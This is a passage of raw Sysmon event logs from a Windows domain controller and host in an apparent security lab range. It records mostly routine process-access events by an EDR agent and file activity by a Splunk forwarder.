AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018831Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.435{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=EB3B45DAB74B9FACF10F2741BD15188D,SHA256=6CE9BA5914CA0D5E3CB08B563C0EEA2D18411E2F802CF2CB0842C4DF7F7C54D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018830Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.120{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CE1352DBA31AC35A33A0E158D5BDCA,SHA256=5198728EA222CB54BAC12EEC722EFE6248BE220D1FE23D9E4CC2F6C76932A263,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.841{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.816{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.790{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.781{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.731{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000047700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.690{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=86321AEB7705E183615F9B98DD83F4E0,SHA256=653E64329B7295E45075660DE8E84F58D568C23839B4A03AFF949FB98198569A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.649{FE4C2B44-E667-63C7-9606-00000000AF02}10321888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.495{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E667-63C7-9606-00000000AF02}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 